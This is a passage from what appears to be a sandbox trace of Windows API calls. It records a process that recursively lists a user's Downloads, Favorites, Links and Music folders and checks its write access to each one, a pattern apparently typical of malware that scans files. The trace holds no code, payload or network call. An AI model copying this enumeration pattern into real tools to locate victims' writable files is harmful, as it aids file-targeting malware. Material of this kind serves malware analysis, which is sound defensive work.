GetLastError () returned 0x7a [0106.318] GetCurrentThread () returned 0xfffffffe [0106.318] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.318] GetCurrentProcess () returned 0xffffffff [0106.318] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.318] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.318] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.318] AccessCheck (in: pSecurityDescriptor=0x28a8800, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.318] CloseHandle (hObject=0x32c) returned 1 [0106.318] CloseHandle (hObject=0x344) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.318] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.318] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.318] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.318] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Downloads\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.319] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Downloads", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.319] GetLastError () returned 0x7a [0106.319] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Downloads", RequestedInformation=0x7, pSecurityDescriptor=0x28a8898, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a8898, lpnLengthNeeded=0x281baf8) returned 1 [0106.319] GetLastError () returned 0x7a [0106.319] GetCurrentThread () returned 0xfffffffe [0106.319] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.319] GetCurrentProcess () returned 0xffffffff [0106.319] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.319] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.319] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.319] AccessCheck (in: pSecurityDescriptor=0x28a8898, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.319] CloseHandle (hObject=0x344) returned 1 [0106.319] CloseHandle (hObject=0x33c) returned 1 [0106.319] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.319] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.319] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.319] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.319] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.319] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.319] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.319] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.320] GetLastError () returned 0x7a [0106.320] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites", RequestedInformation=0x7, pSecurityDescriptor=0x28a8898, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a8898, lpnLengthNeeded=0x281baf8) returned 1 [0106.320] GetLastError () returned 0x7a [0106.320] GetCurrentThread () returned 0xfffffffe [0106.320] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.320] GetCurrentProcess () returned 0xffffffff [0106.320] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.320] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.320] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.320] AccessCheck (in: pSecurityDescriptor=0x28a8898, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.320] CloseHandle (hObject=0x344) returned 1 [0106.320] CloseHandle (hObject=0x33c) returned 1 [0106.320] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.320] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.320] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.320] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\Links\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.320] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\Links", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.320] GetLastError () returned 0x7a [0106.320] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\Links", RequestedInformation=0x7, pSecurityDescriptor=0x28a8898, nLength=0xa4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8898, lpnLengthNeeded=0x281b560) returned 1 [0106.320] GetLastError () returned 0x7a [0106.320] GetCurrentThread () returned 0xfffffffe [0106.320] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.320] GetCurrentProcess () returned 0xffffffff [0106.320] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.320] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.320] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.320] AccessCheck (in: pSecurityDescriptor=0x28a8898, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.321] CloseHandle (hObject=0x32c) returned 1 [0106.321] CloseHandle (hObject=0x344) returned 1 [0106.321] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.321] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.321] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.321] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.321] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.321] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.321] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.321] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.325] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\Microsoft Websites", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.325] GetLastError () returned 0x7a [0106.325] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\Microsoft Websites", RequestedInformation=0x7, pSecurityDescriptor=0x28a8898, nLength=0xa4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8898, lpnLengthNeeded=0x281b560) returned 1 [0106.325] GetLastError () returned 0x7a [0106.325] GetCurrentThread () returned 0xfffffffe [0106.325] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.325] GetCurrentProcess () returned 0xffffffff [0106.325] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.325] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.326] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.326] AccessCheck (in: pSecurityDescriptor=0x28a8898, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.326] CloseHandle (hObject=0x32c) returned 1 [0106.326] CloseHandle (hObject=0x344) returned 1 [0106.326] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.326] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.326] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.326] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.326] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.326] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.326] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.326] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.326] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.326] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\MSN Websites\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.333] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\MSN Websites", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.333] GetLastError () returned 0x7a [0106.333] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\MSN Websites", RequestedInformation=0x7, pSecurityDescriptor=0x28a8898, nLength=0xa4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8898, lpnLengthNeeded=0x281b560) returned 1 [0106.333] GetLastError () returned 0x7a [0106.334] GetCurrentThread () returned 0xfffffffe [0106.334] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.334] GetCurrentProcess () returned 0xffffffff [0106.334] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.334] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.334] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.334] AccessCheck (in: pSecurityDescriptor=0x28a8898, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.334] CloseHandle (hObject=0x32c) returned 1 [0106.334] CloseHandle (hObject=0x344) returned 1 [0106.334] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.334] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.334] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.334] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.334] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.334] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.334] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.334] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.334] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.334] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.335] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\Windows Live\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.335] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\Windows Live", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.335] GetLastError () returned 0x7a [0106.335] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Favorites\\Windows Live", RequestedInformation=0x7, pSecurityDescriptor=0x28a8898, nLength=0xa4, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x28a8898, lpnLengthNeeded=0x281b560) returned 1 [0106.336] GetLastError () returned 0x7a [0106.336] GetCurrentThread () returned 0xfffffffe [0106.336] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.336] GetCurrentProcess () returned 0xffffffff [0106.336] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x344) returned 1 [0106.336] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.336] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.336] AccessCheck (in: pSecurityDescriptor=0x28a8898, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.336] CloseHandle (hObject=0x32c) returned 1 [0106.336] CloseHandle (hObject=0x344) returned 1 [0106.336] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.336] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.336] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.336] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.336] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.336] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.336] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.336] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.336] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.337] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Links\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.337] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Links", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.337] GetLastError () returned 0x7a [0106.337] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Links", RequestedInformation=0x7, pSecurityDescriptor=0x28a8898, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a8898, lpnLengthNeeded=0x281baf8) returned 1 [0106.337] GetLastError () returned 0x7a [0106.337] GetCurrentThread () returned 0xfffffffe [0106.337] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.337] GetCurrentProcess () returned 0xffffffff [0106.337] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.337] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.337] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.337] AccessCheck (in: pSecurityDescriptor=0x28a8898, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.337] CloseHandle (hObject=0x344) returned 1 [0106.337] CloseHandle (hObject=0x33c) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0 [0106.337] FindClose (in: hFindFile=0x5fc318 | out: hFindFile=0x5fc318) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.337] FindNextFileW (in: hFindFile=0x5fc2d8, lpFindFileData=0x281c0b4 | out: lpFindFileData=0x281c0b4) returned 1 [0106.337] FindFirstFileW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\*", lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 0x5fc318 [0106.338] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Music", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281baf8) returned 0 [0106.338] GetLastError () returned 0x7a [0106.338] GetFileSecurityW (in: lpFileName="c:\\Users\\aETAdzjz\\Music", RequestedInformation=0x7, pSecurityDescriptor=0x28a8898, nLength=0xa4, lpnLengthNeeded=0x281baf8 | out: pSecurityDescriptor=0x28a8898, lpnLengthNeeded=0x281baf8) returned 1 [0106.338] GetLastError () returned 0x7a [0106.338] GetCurrentThread () returned 0xfffffffe [0106.338] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x0) returned 0 [0106.338] GetCurrentProcess () returned 0xffffffff [0106.338] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281bb00 | out: TokenHandle=0x281bb00*=0x33c) returned 1 [0106.338] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281bafc | out: DuplicateTokenHandle=0x281bafc*=0x344) returned 1 [0106.338] MapGenericMask (in: AccessMask=0x281bb0c, GenericMapping=0x281badc | out: AccessMask=0x281bb0c) [0106.338] AccessCheck (in: pSecurityDescriptor=0x28a8898, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281badc, PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4 | out: PrivilegeSet=0x281bac8, PrivilegeSetLength=0x281baec, GrantedAccess=0x281baf0, AccessStatus=0x281baf4) returned 1 [0106.338] CloseHandle (hObject=0x344) returned 1 [0106.338] CloseHandle (hObject=0x33c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.338] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) 